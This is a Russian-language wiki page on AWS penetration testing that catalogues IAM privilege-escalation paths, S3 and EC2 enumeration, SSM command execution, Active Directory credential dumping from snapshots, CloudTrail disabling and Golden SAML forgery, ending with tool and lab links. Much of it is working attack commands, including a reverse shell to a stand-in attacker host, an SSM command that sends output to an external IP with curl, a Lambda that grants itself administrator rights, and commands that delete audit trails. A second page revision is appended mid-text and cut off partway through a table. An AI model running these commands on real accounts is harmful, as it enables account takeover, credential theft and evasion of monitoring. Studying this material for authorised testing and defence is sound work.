aws lambda update-function-code --function-name target_function --zip-file fileb://my/lambda/code/zipped.zip
</syntaxhighlight>

==== lambda:CreateFunction + lambda:InvokeFunction + iam:PassRole ====

Позволяет создать функцию и прикрепить к ней произвольную роль, после чего запустить.

Код функции:
<syntaxhighlight lang="python" line="1" enclose="div" style="overflow-x:scroll" >
import boto3
def lambda_handler(event, context):
client = boto3.client('iam')
response = client.attach_user_policy(
UserName='my_username',
PolicyArn="arn:aws:iam::aws:policy/AdministratorAccess"
)
return response
</syntaxhighlight>

Команды для запуска:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
# Создание функции
aws lambda create-function --function-name my_function --runtime python3.6 --role arn_of_lambda_role --handler lambda_function.lambda_handler --code file://my/python/code.py
# Запуск
aws lambda invoke --function-name my_function output.txt
</syntaxhighlight>

=== Роли - управление ===

==== lambda:GetFunction ====

Также может понадобиться lambda:ListFunctions чтобы не перебирать названия функций.

Позволяет прочитать исходный код функции (в котором например может быть секрет сохранен):
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
# Получить список функций
aws lambda list-functions --profile uploadcreds
# Получить информацию о Lambda-функции
aws lambda get-function --function-name "LAMBDA-NAME-HERE-FROM-PREVIOUS-QUERY" --query 'Code.Location' --profile uploadcreds
# Скачать исходный код по ссылке из предыдущего ответа
wget -O lambda-function.zip url-from-previous-query --profile uploadcreds
</syntaxhighlight>

== Glue ==

Бессерверная служба интеграции данных, упрощающая поиск, подготовку и объединение данных для анализа, машинного обучения и разработки приложений.

=== Роли - повышение привилегий ===

==== glue:UpdateDevEndpoint ====

Позволяет обновить параметры Glue Development Endpoint, тем самым получив контроль над ролями, прикрепленными к этому Glue Development Endpoint:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
# TODO: это не обновление параметров, надо обновить команду
aws glue --endpoint-name target_endpoint --public-key file://path/to/my/public/ssh/key.pub
</syntaxhighlight>

==== glue:CreateDevEndpoint + iam:PassRole ====

Позволяет получить доступ к ролям, которые прикреплены к любому сервису Glue:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
aws glue create-dev-endpoint --endpoint-name my_dev_endpoint --role-arn arn_of_glue_service_role --public-key file://path/to/my/public/ssh/key.pub
</syntaxhighlight>

== S3 ==

Файловое хранилище, доступное по http(s).

Формат ссылки:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
https://{bucket_name}.s3.amazonaws.com
https://s3.amazonaws.com/{bucket_name}/

# US Standard
http://s3.amazonaws.com
# Ireland
http://s3-eu-west-1.amazonaws.com
# Northern California
http://s3-us-west-1.amazonaws.com
# Singapore
http://s3-ap-southeast-1.amazonaws.com
# Tokyo
http://s3-ap-northeast-1.amazonaws.com
</syntaxhighlight>

Делать запросы можно:

* В браузере - http(s)

* Используя awscli:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
aws s3 ls s3://flaws.cloud/ [--no-sign-request] [--profile <PROFILE_NAME>] [ --recursive] [--region us-west-2]
</syntaxhighlight>

В S3 может использоваться шифрование:

* SSE-KMS - Server-Side с ключами KMS

* SSE-C - Server-Side с ключами заказчика

* CSE-KMS - Client-Side с ключами KMS

* CSE-C - Client-Side с ключами заказчика

=== Сбор информации ===

==== Определение региона ====

<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
$ dig flaws.cloud
;; ANSWER SECTION:
flaws.cloud. 5 IN A 52.218.192.11

$ nslookup 52.218.192.11
Non-authoritative answer:
11.192.218.52.in-addr.arpa name = s3-website-us-west-2.amazonaws.com

# Итоговый URL будет:
flaws.cloud.s3-website-us-west-2.amazonaws.com
flaws.cloud.s3-us-west-2.amazonaws.com
</syntaxhighlight>
Если будет некорректный регион - редиректнет на корректный.

==== Список файлов ====

На S3-Bukket может быть включен листинг директорий, для этого достаточно перейти в браузере на хранилище и посмотреть возвращенный XML.

Список файлов может быть включен отдельно на определенные директории, поэтому может потребоваться брут директорий используя, например, wfuzz (подстрока AccessDenied).

=== Роли - управление ===

==== s3:ListBucket ====

Посмотреть список файлов в S3-хранилище:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
aws s3 ls s3://flaws.cloud/ [--no-sign-request] [--profile <PROFILE_NAME>] [ --recursive] [--region us-west-2]
</syntaxhighlight>

==== s3:ListAllMyBuckets ====

Посмотреть список всех S3-хранилищ, доступных мне:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
aws s3api list-buckets
aws s3 ls
</syntaxhighlight>

== CloudFront ==

Сервис сети доставки контента (CDN).

Формат ссылки:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
https://{random_id}.cloudfront.net
</syntaxhighlight>

== EC2 (Elastic Compute Cloud) ==

EC2 (Amazon Elastic Compute Cloud) == VPS

Состоит из:

* Instance - название виртуальной машины

* AMI (Amazon Machine Image) - образ виртуальной машины

* SSM Agent - программное обеспечение Amazon, которое запущено на всеx EC2-инстансах, серверах и тд.

Формат ссылки:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
ec2-{ip-seperated}.compute-1.amazonaws.com
</syntaxhighlight>

=== SSM Agent ===

Как уже выше написано, SSM Agent - программное обеспечение Amazon, которое запущено на всеx EC2-инстансах, серверах и тд.

Его тоже можно выбрать целью атаки

==== MITM ====

Есть возможность вклиниваться в общение от SSM-Агента локально.

PoC: https://github.com/Frichetten/ssm-agent-research/tree/main/ssm-session-interception

Полная статья: https://frichetten.com/blog/ssm-agent-tomfoolery/

=== Роли - повышение привилегий ===

==== ec2:RunInstance + iam:PassRole ====

Позволяет прикрепить существующую роль к скомпрометированной EC2-машине.

1. Запуск машины c новой прикрепленной ролью

2. Подключение к ней

3. Работа с прикрепленной ролью

Создание EC2 с известным SSH-ключем:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
aws ec2 run-instances --image-id ami-a4dc46db --instance-type t2.micro --iam-instance-profile Name=iam-full-access-ip --key-name my_ssh_key --security-group-ids sg-123456
</syntaxhighlight>

Второй вариант - скрипт для запуска:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
aws ec2 run-instances --image-id ami-a4dc46db --instance-type t2.micro --iam-instance-profile Name=iam-full-access-ip --user-data file://script/with/reverse/shell.sh
</syntaxhighlight>

Важно! Может спалиться с GuardDuty когда учетные данные пользователя будут использованы на стороннем инстансе EC2.

=== Роли - повышение до админа ===

==== ec2:AssociateIamInstanceProfile ====

Позволяет менять IAM политики/роли/пользователей

==== ec2:CreateInstanceProfile/ec2:AddRoleToInstanceProfile + iam:PassRole ====

Позволяет создать новый привилегированный профиль для инстанса и прикрепить его к скомпрометированной EC2-машине.

=== Роли - управление ===

==== ec2:CreateVolume + ec2:AttachVolume ====

См. EBS.

==== ec2:DescribeSnapshots ====

Позволяет посмотреть информацию о SnapShot'ах, которые позже мб потребуется прочитать:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
aws ec2 describe-snapshots --profile flawscloud --owner-id 975426262029 --region us-west-2
</syntaxhighlight>

==== ec2:CreateVolume ====

Прзврояет примаунтить SnapShot, чтобы потом его изучить:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
aws ec2 create-volume --profile YOUR_ACCOUNT --availability-zone us-west-2a --region us-west-2 --snapshot-id snap-0b49342abd1bdcb89
</syntaxhighlight>

==== ec2:* (Копирование EC2) ====

Позволяет скопировать EC2 используя AMI-images:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
# Создаем новый AMI из Instance-ID
aws ec2 create-image --instance-id i-0438b003d81cd7ec5 --name "AWS Audit" --description "Export AMI" --region eu-west-1

# Добавляем наш ключ в систему
aws ec2 import-key-pair --key-name "AWS Audit" --public-key-material file://~/.ssh/id_rsa.pub --region eu-west-1

# Создаем EC2-Instance используя созданный AMI (параметры security group и подсеть оставили те же)
aws ec2 run-instances --image-id ami-0b77e2d906b00202d --security-group-ids "sg-6d0d7f01" --subnet-id subnet-9eb001ea --count 1 --instance-type t2.micro --key-name "AWS Audit" --query "Instances[0].InstanceId" --region eu-west-1

# Проверяем запустился ли инстанс
aws ec2 describe-instances --instance-ids i-0546910a0c18725a1

# Не обязательно - редактируем группу инстанса
aws ec2 modify-instance-attribute --instance-id "i-0546910a0c18725a1" --groups "sg-6d0d7f01" --region eu-west-1

# В конце работы - останавливаем и удаляем инстанс
aws ec2 stop-instances --instance-id "i-0546910a0c18725a1" --region eu-west-1
aws ec2 terminate-instances --instance-id "i-0546910a0c18725a1" --region eu-west-1
</syntaxhighlight>

==== ec2-instance-connect:SendSSHPublicKey ====

Добавить SSH-ключ к EC2-инстансу. Ключ будет существовать 60 секунд.

<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
# Получаем информацию об инстансе, который будем атаковать.
aws ec2 describe-instances --profile uploadcreds --region eu-west-1 | jq ".[][].Instances | .[] | {InstanceId, KeyName, State}"

# Добавляем ключ к EC2-инстансу.
aws ec2-instance-connect send-ssh-public-key --region us-east-1 --instance-id INSTANCE --availability-zone us-east-1d --instance-os-user ubuntu --ssh-public-key file://shortkey.pub --profile uploadcreds</syntaxhighlight>

==== ec2-instance-connect:SendSerialConsoleSSHPublicKey ====

Добавить SSH-ключ к EC2-инстансу. Ключ будет существовать 60 секунд.

В отличие от предыдущего пункта, этот ключ можно использовать только при подключении EC2 Serial Console.

<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
# Получаем информацию об инстансе, который будем атаковать.
aws ec2 describe-instances --profile uploadcreds --region eu-west-1 | jq ".[][].Instances | .[] | {InstanceId, KeyName, State}"

# Добавляем ключ к EC2-инстансу.
aws ec2-instance-connect send-serial-console-ssh-public-key --instance-id i-001234a4bf70dec41EXAMPLE --serial-port 0 --ssh-public-key file://my_key.pub --region us-east-1

# Подключаемся (кроме GovCloud US региона)
ssh -i my_key i-001234a4bf70dec41EXAMPLE.port0@serial-console.ec2-instance-connect.us-east-1.aws
# Подключаемся (только для GovCloud US региона)
ssh -i my_key i-001234a4bf70dec41EXAMPLE.port0@serial-console.ec2-instance-connect.us-gov-east-1.amazonaws.com

# В некоторых случаях нужно подключиться к EC2 и перезагрузить сервис getty (лучше пробовать только, когда не смогли подключиться)
sudo systemctl restart serial-getty@ttyS0
# Если не сработало - мб требуется ребутать сервер.
</syntaxhighlight>

Также можно подключиться, используя браузер. Подробнее тут: https://docs.aws.amazon.com/AWSEC2/latest/UserGuide/connect-to-serial-console.html

==== ssm:SendCommand ====

Позволяет запускать команды в EC2-Instances. Если нет дополнительных прав, то потребуется:

* Знать Instance-ID, на котором запущен сервис SSM

* Свой сервер, на который будет приходить отстук - результат команды.

Команды для эксплуатации:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
# Получаем информацию о SSM сервисах - может потребоваться ssm:DescribeInstanceInformation
aws ssm describe-instance-information --profile stolencreds --region eu-west-1
# Выполняем команду
aws ssm send-command --instance-ids "INSTANCE-ID-HERE" --document-name "AWS-RunShellScript" --comment "IP Config" --parameters commands=ifconfig --output text --query "Command.CommandId" --profile stolencreds
# Получаем результат команды(может не хватить прав ssm:ListCommandInvocations)
aws ssm list-command-invocations --command-id "COMMAND-ID-HERE" --details --query "CommandInvocations[].CommandPlugins[].{Status:Status,Output:Output}" --profile stolencreds

# Пример - результат команды на удаленный сервер
$ aws ssm send-command --instance-ids "i-05b████████adaa" --document-name "AWS-RunShellScript" --comment "whoami" --parameters commands='curl 162.243.███.███:8080/`whoami`' --output text --region=us-east-1
</syntaxhighlight>

==== EC2:CreateSnapshot + Active Directory ====

См. AD.

== Auto Scaling (autoscaling) ==

Сервис для масштабирования приложений. Работает преимущественно с EC2, ECS, DynamoDB (таблицы и индексы) и Aurora.

Для работы сервиса требуется:

1. Конфигурация запуска EC2.

2. Конфигурация масштабирования.

== Роли - повышение привилегий ==

=== autoscaling:CreateLaunchConfiguration + autoscaling:Create(Update)AutoScalingGroup + iam:PassRole ===

Позволяет создать и запустить конфигурацию масштабирования.

==== Создаем конфигурацию запуска EC2 ====

Для создания требуется:

1. Image-id

2. iam-instance-profile

Следующая команда создает конфигурацию с командой из файла reverse-shell.sh:

<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
aws autoscaling create-launch-configuration --launch-configuration-name demo3-LC --image-id ami-0f90b6b11936e1083 --instance-type t1.micro --iam-instance-profile demo-EC2Admin --metadata-options "HttpEndpoint=enabled,HttpTokens=optional" --associate-public-ip-address --user-data=file://reverse-shell.sh
</syntaxhighlight>

Пример содержимого reverse-shell.sh:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
#!/bin/bash
/bin/bash -l > /dev/tcp/atk.attacker.xyz/443 0<&1 2>&1
</syntaxhighlight>

==== Создаем и запускаем группу масштабируемости ====

Привилегия ec2:DescribeSubnets нужна для выбора нужной сети (чтобы EC2 смог сделать reverse-соедиенение к нам).

<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
aws autoscaling create-auto-scaling-group --auto-scaling-group-name demo3-ASG --launch-configuration-name demo3-LC --min-size 1 --max-size 1 --vpc-zone-identifier "subnet-aaaabbb"
</syntaxhighlight>

Подробнее тут https://notdodo.medium.com/aws-ec2-auto-scaling-privilege-escalation-d518f8e7f91b

== AD (Directory Service) ==

Второе название - AWS Managed Microsoft Active Directory. Позволяет использовать Active Directory в AWS.

Основные понятия:

* EC2-Instance - VPS на которых крутится весь Active Directory

=== Роли - повышение привилегий ===

==== EC2:CreateSnapshot + EC2:RunInstance -> ShadowCopy ====

Позволяет провести атаку ShadowCopy на доменный контроллер и считать учетные данные всех пользователей.

Последовательность атаки:

1. Получаем список инстансов

2. Создаем Snapshot выбранного сервера

3. Редактируем атрибуты у SnapShot для доступа с аккаунта атакующего.
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
aws ec2 modify-snapshot-attribute --snapshot-id snap-1234567890abcdef0 --attribute createVolumePermission --operation-type remove --user-ids 123456789012
</syntaxhighlight>

4. Переключаемся на аккаунт атакующего

5. Создаем новый Linux EC2-инстанс, к которому будет прикреплен SnapShot

6. Подключаемся по SSH и получаем данные из SnapShot
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
sudo -s
mkdir /tmp/windows
mount /dev/xvdf1 /tmp/windows/
cd /tmp/windows/
</syntaxhighlight>

7. Работаем с данными на примонтированном диске, который будет в /tmp/windows/. Пример команд для извлечения ntds.dit:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
cp /windows/Windows/NTDS/ntds.dit /home/ec2-user
cp /windows/Windows/System32/config/SYSTEM /home/ec2-user
chown ec2-user:ec2-user /home/ec2-user/*
# Sftp - скачиваем файлы:
/home/ec2-user/SYSTEM
/home/ec2-user/ntds.dit
# Получаем учетные данные, используя Impacket-secretsdump
secretsdump.py -system ./SYSTEM -ntds ./ntds.dit local -outputfile secrets
</syntaxhighlight>

== CloudTrail ==

Сервис для аудита событий в AWS-аккаунте (включен в каждом аккаунте по-умолчанию). Сервис позволяет вести журналы, осуществлять непрерывный мониторинг и сохранять информацию об истории аккаунта в пределах всей используемой инфраструктуры AWS.

Записывает:

* API-вызовы

* Логины в систему

* События сервисов

* ???

Важен при операциях RedTeam.

Название файла логов:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
AccountID_CloudTrail_RegionName_YYYYMMDDTHHmmZ_UniqueString.FileNameFormat
</syntaxhighlight>

S3 путь до логов:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
BucketName/prefix/AWSLogs/AccountID/CloudTrail/RegionName/YYYY/MM/DD
</syntaxhighlight>

Путь у CloudTrail-Digest файлов:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
s3://s3-bucket-name/optional-prefix/AWSLogs/aws-account-id/CloudTrail-Digest/region/digest-end-year/digest-end-month/digest-end-data/aws-account-id_CloudTrail-Digest_region_trail-name_region_digest_end_timestamp.json.gz
</syntaxhighlight>

Основные поля у событий:

* eventName - имя API-endpoint

* eventSource - вызванный сервис

* eventTime - время события

* SourceIPAddress - ip-адрес источника

* userAgent - метод запроса
** "signing.amazonaws.com" - запрос от AWS Management Console
** "console.amazonaws.com" - запрос от root-пользователя аккаунта
** "lambda.amazonaws.com" - запрос от AWS Lambda

* requestParameters - параметры запроса

* responseElements - элементы ответа.

Временные параметры:

* 5 минут - сохраняется новый лог-файл

* 15 минут - сохраняется в S3.

Важно! Сохраняется чексумма файлов, поэтому пользователи могут удостовериться что логи не менялись.
Также логи могут уходить напрямую в CloudWatch - администраторам может прилететь уведомление об ИБ-инцидентах. Или события могут быть проанализированы внутренним модулем CloudTrail - Insights на предмет необычной активности.

=== Роли - управление ===

==== cloudtrail:DeleteTrail ====

Позволяет отключить мониторинг:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
aws cloudtrail delete-trail --name cloudgoat_trail --profile administrator
</syntaxhighlight>

==== cloudtrail:UpdateTrail ====

Права на редактирование правил монитринга.

Отключить мониторинг глобальных сервисов:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
aws cloudtrail update-trail --name cloudgoat_trail --no-include-global-service-event
</syntaxhighlight>

Отключить мониторинг на конкретные регионы:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
aws cloudtrail update-trail --name cloudgoat_trail --no-include-global-service-event --no-is-multi-region --region=eu-west
</syntaxhighlight>

==== validate-logs ====

Проверить, были ли изменены логи.

aws cloudtrail validate-logs --trail-arn <trailARN> --start-time <start-time> [--end-time <end-time>] [--s3-bucket <bucket-name>] [--s3-prefix <prefix>] [--verbose]

=== Эксплуатация ===

==== Обход правила по UserAgent ====

На сервисе есть правило, по которому определяет, что запросы были сделаны с kali/parrot/pentoo используя awscli.

Для этого можно воспользоваться утилитой pacu, которая автоматически подменяет useragent. Использование утилиты в конце статьи.

== DynamoDB ==

Cистема управления базами данных класса NoSQL в формате «ключ — значение».

=== Роли - управление ===

==== dynamodb:ListTables ====

Позволяет посмотреть спрсок таблиц базы данных.
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
aws --endpoint-url http://s3.bucket.htb dynamodb list-tables

{
"TableNames": [
"users"
]
}
</syntaxhighlight>

==== dynamodb:Scan ====

Получение обьектов из базы данных:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
aws --endpoint-url http://s3.bucket.htb dynamodb scan --table-name users | jq -r '.Items[]'

{
"password": {
"S": "Management@#1@#"
},
"username": {
"S": "Mgmt"
}
}
</syntaxhighlight>

== ES (ElasticSearch) ==

ElasticSearch от AWS. Используется для просмотра логов/журналов, поиска на вебсайте и тд.

Формат ссылки:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
https://{user_provided}-{random_id}.{region}.es.amazonaws.com
</syntaxhighlight>

== ELB (Elastic Load Balancing) ==

Балансировщик нагрузки.

Формат ссылки (elb_v1):
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
http://{user_provided}-{random_id}.{region}.elb.amazonaws.com:80/443
</syntaxhighlight>

Формат ссылки (elb_v2):
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
https://{user_provided}-{random_id}.{region}.elb.amazonaws.com
</syntaxhighlight>

== RDS (Relational Database Service) ==

Облачная реляционная база данных (на выбор).

Формат ссылки:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
mysql://{user_provided}.{random_id}.{region}.rds.amazonaws.com:3306
postgres://{user_provided}.{random_id}.{region}.rds.amazonaws.com:5432
</syntaxhighlight>

== Route 53 ==

Настраиваемая служба DNS.

Формат ссылки:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
{user_provided}
</syntaxhighlight>

== API Gateway ==

API-сервис, который будет доступен почти со всех серверов.

Формат ссылки:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
https://{restapi_id}.execute-api.{region}.amazonaws.com/{stage_name}/
https://{random_id}.execute-api.{region}.amazonaws.com/{user_provided}
</syntaxhighlight>

== CloudSearch ==

Альтернатива сервису ElasticSearch. Система для упрощения поиска для администрирования и, например, на вебсайте.

Формат ссылки:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
https://doc-{user_provided}-{random_id}.{region}.cloudsearch.amazonaws.com
</syntaxhighlight>

== Transfer Family ==

Группа сервисов для передачи файлов (S3/EFS) по (SFTP, FTPS, FTP).

Формат ссылки:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
sftp://s-{random_id}.server.transfer.{region}.amazonaws.com
ftps://s-{random_id}.server.transfer.{region}.amazonaws.com
ftp://s-{random_id}.server.transfer.{region}.amazonaws.com
</syntaxhighlight>

== IoT (Internet Of Things) ==

Сервис для управления IoT-устройствами.

Формат ссылки:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
mqtt://{random_id}.iot.{region}.amazonaws.com:8883
https://{random_id}.iot.{region}.amazonaws.com:8443
https://{random_id}.iot.{region}.amazonaws.com:443
</syntaxhighlight>

== MQ ==

Сервис брокера сообщений для Apache ActiveMQ & RabbitMQ.

Формат ссылки:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
https://b-{random_id}-{1,2}.mq.{region}.amazonaws.com:8162
ssl://b-{random_id}-{1,2}.mq.{region}.amazonaws.com:61617
</syntaxhighlight>

== MSK (Managed Streaming for Apache Kafka) ==

Сервис потоковой передачи данных в Apache Kafka.

Формат ссылки:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
b-{1,2,3,4}.{user_provided}.{random_id}.c{1,2}.kafka.{region}.amazonaws.com
{user_provided}.{random_id}.c{1,2}.kafka.useast-1.amazonaws.com
</syntaxhighlight>

== Cloud9 ==

Облачная интегрированная среда разработки(IDE) используя только браузер.

Формат ссылки:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
https://{random_id}.vfs.cloud9.{region}.amazonaws.com
</syntaxhighlight>

== MediaStore ==

Cервис хранилища AWS, оптимизированный для мультимедийных материалов.

Формат ссылки:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
https://{random_id}.data.mediastore.{region}.amazonaws.com
</syntaxhighlight>

== Kinesis Video Streams ==

Обеспечивает простую и безопасную потоковую передачу видео с подключенных устройств в AWS для воспроизведения, аналитики, машинного обучения (ML) и других видов обработки.

Формат ссылки:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
https://{random_id}.kinesisvideo.{region}.amazonaws.com
</syntaxhighlight>

== Elemental MediaConvert ==

Сервис перекодирования видеофайлов с возможностями на уровне вещательных компаний. Он позволяет просто создавать контент в формате «видео по требованию» (VOD) для трансляций, в том числе мультиэкранных, в любом масштабе.

Формат ссылки:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
https://{random_id}.mediaconvert.{region}.amazonaws.com
</syntaxhighlight>

== Elemental MediaPackage ==

Cервис для подготовки и защиты видеоконтента, распространяемого через Интернет. AWS Elemental MediaPackage использует один источник видео и создает на его основе специализированные видеопотоки для воспроизведения на подключенных телевизорах, мобильных телефонах, компьютерах, планшетах и игровых консолях.

Формат ссылки:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
https://{random_id}.mediapackage.{region}.amazonaws.com/in/v1/{random_id}/channel
</syntaxhighlight>

== ECR (Elastic Container Registry) ==

Региональный сервис, предназначенный для обеспечения гибкого развертывания образов.

=== Роли - управление ===

==== ecr:ListImages ====

Получить список образов:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
aws ecr list-images --repository-name <ECR_name> --registry-id <UserID> --region <region> --profile <profile_name>
</syntaxhighlight>

==== ecr:GetDownloadUrlForLayer ====

Позволяет получить URL на скачивание образа.

==== ecr:GetDownloadUrlForLayer + ecr:BatchGetImage + ecr:GetAuthorizationToken ====

Позволяет скачать образ (мб потребуется и ecr:ListImages чтобы получить список образов):
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
aws ecr get-login
docker pull <UserID>.dkr.ecr.us-east-1.amazonaws.com/<ECRName>:latest
docker inspect sha256:079aee8a89950717cdccd15b8f17c80e9bc4421a855fcdc120e1c534e4c102e0
</syntaxhighlight>

= Утилиты =

== Вычисление ролей ==

=== enumerate-iam ===
github.com:andresriancho/enumerate-iam.git

== Эксплуатация ==

=== Golden SAML ===

Суть атаки в том, что зная ключ, которым подписываются SAML-запросы, вы можете подделать ответ и получить произвольные привилегии в SSO.

Подробнее про эксплуатацию тут: https://www.cyberark.com/resources/threat-research-blog/golden-saml-newly-discovered-attack-technique-forges-authentication-to-cloud-apps

==== shimit ====
https://github.com/cyberark/shimit

Установка:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:auto" >
cd /tmp
python -m pip install boto3 botocore defusedxml enum python_dateutil lxml signxml
git clone https://github.com/cyberark/shimit
cd shmit
python shmit.py
</syntaxhighlight>

В начале потребуется доступ к AD FS аккаунту из персонального хранилища которого украсть приватный ключ ключ.
Сделать это можно используя mimikatz, но в примере сделано через библиотеку Microsoft.Adfs.Powershell и powershell

Пример эксплуатации:
<syntaxhighlight lang="powershell" line="1" enclose="div" style="overflow-x:auto" >
# Получаем приватный ключ
[System.Convert]::ToBase64String($cer.rawdata)
(Get-ADFSProperties).Identifier.AbsoluteUri
(Get-ADFSRelyingPartyTrust).IssuanceTransformRule

# Получаем инфу о юзерах - выбираем цель
aws iam list-users

# Получаем токен
python .\shimit.py -idp http://adfs.lab.local/adfs/services/trust -pk key_file -c cert_file
-u domain\admin -n admin@domain.com -r ADFS-admin -r ADFS-monitor -id 123456789012

# Проверяем текущий аккаунт
aws opsworks describe-my-user-profile
</syntaxhighlight>

== Проверки безопасности ==

Для администраторов преимущественно.

=== Zeus ===

https://github.com/DenizParlak/Zeus

== Другое ==

=== aws_consoler ===

https://github.com/NetSPI/aws_consoler

== All-In-One ==

=== pacu ===

https://github.com/RhinoSecurityLabs/pacu

=== ScoutSuite ===

https://github.com/nccgroup/ScoutSuite

=== cloudfox ===

https://github.com/BishopFox/cloudfox

= Ссылки =

== Статьи ==

[https://frichetten.com/blog/hijack-iam-roles-and-avoid-detection/ Hijacking IAM Roles and Avoiding Detection]

[https://frichetten.com/blog/bypass-guardduty-pentest-alerts/ Bypass GuardDuty PenTest Alerts]

[https://frichetten.com/blog/ssm-agent-tomfoolery/ Intercept SSM Agent Communications]

== Лаборатории ==

[https://medium.com/poka-techblog/privilege-escalation-in-the-cloud-from-ssrf-to-global-account-administrator-fd943cf5a2f6 Damn Vulnerable Cloud Application]

[https://github.com/nccgroup/sadcloud SadCloud]

[http://flaws.cloud Flaws]

[http://flaws2.cloud/ Flaws]

[https://xakep.ru/2022/03/21/htb-stacked/ HackTheBox Stacked Writeup]

[https://github.com/RhinoSecurityLabs/cloudgoat CloudGoat]

[https://github.com/nccgroup/sadcloud SadCloud]

[https://www.wellarchitectedlabs.com/security/ AWS Well-Architected Labs]

[https://labs.withsecure.com/publications/attack-detection-fundamentals-2021-aws-lab-1 Attack Detection Fundamentals 2021: AWS - Lab #1]

== Краткие заметки ==

[https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Cloud%20-%20AWS%20Pentest.md PayloadAllTheThings]

[https://book.hacktricks.xyz/pentesting/pentesting-web/buckets/aws-s3 hacktricks-s3]

[https://book.hacktricks.xyz/cloud-security/aws-security hacktricks-aws]

[https://learntocloud.guide/#/phase5/README learntocloud(много ссылок)]

== Книги ==

[https://www.amazon.com/dp/1789136725/ Hands-On AWS Penetration Testing with Kali Linux]

Aws

2022-10-05T22:01:44Z

Drakylar: /* Службы */

AWS - Amazon Web Service. Одна из первых облачных систем, состоящая из многих сервисов, которые при некорректной настройке оставляют дыры в безопасности.

= Организационные моменты =

При проведении тестирования на проникновение, требуется предупредить AWS (составить заявку).

Подробнее тут: https://aws.amazon.com/ru/security/penetration-testing/

= Общие концепции =

== Службы ==

Концепция служб в AWS позволяет автоматизировать многие процессы, включая саму разработку архитектуры.

Это экосистема многих сервисов. И AWS стремится увеличить их количество.

Например, связать сервис сбора логов и сервис по реагированию на инциденты, а результаты класть на сервис S3.

== Регионы ==

AWS разделен на регионы. Часть сервисов кросс-региональные, но большинство привязываются к конкретным регионам.

{| class="wikitable"
|+Регионы AWS
|-
| '''Название региона'''
| '''Endpoint(HTTPS)'''
|-
|us-east-2
|rds.us-east-2.amazonaws.com

rds-fips.us-east-2.api.aws

rds.us-east-2.api.aws

rds-fips.us-east-2.amazonaws.com
|-
|us-east-1
|rds.us-east-1.amazonaws.com

rds-fips.us-east-1.api.aws

rds-fips.us-east-1.amazonaws.com

rds.us-east-1.api.aws
|-
|us-west-1
|rds.us-west-1.amazonaws.com

rds.us-west-1.api.aws

rds-fips.us-west-1.amazonaws.com

rds-fips.us-west-1.api.aws
|-
|us-west-2
|rds.us-west-2.amazonaws.com

rds-fips.us-west-2.amazonaws.com

rds.us-west-2.api.aws

rds-fips.us-west-2.api.aws
|-
|af-south-1
|rds.af-south-1.amazonaws.com

rds.af-south-1.api.aws
|-
|ap-east-1
|rds.ap-east-1.amazonaws.com

rds.ap-east-1.api.aws
|-
|ap-southeast-3
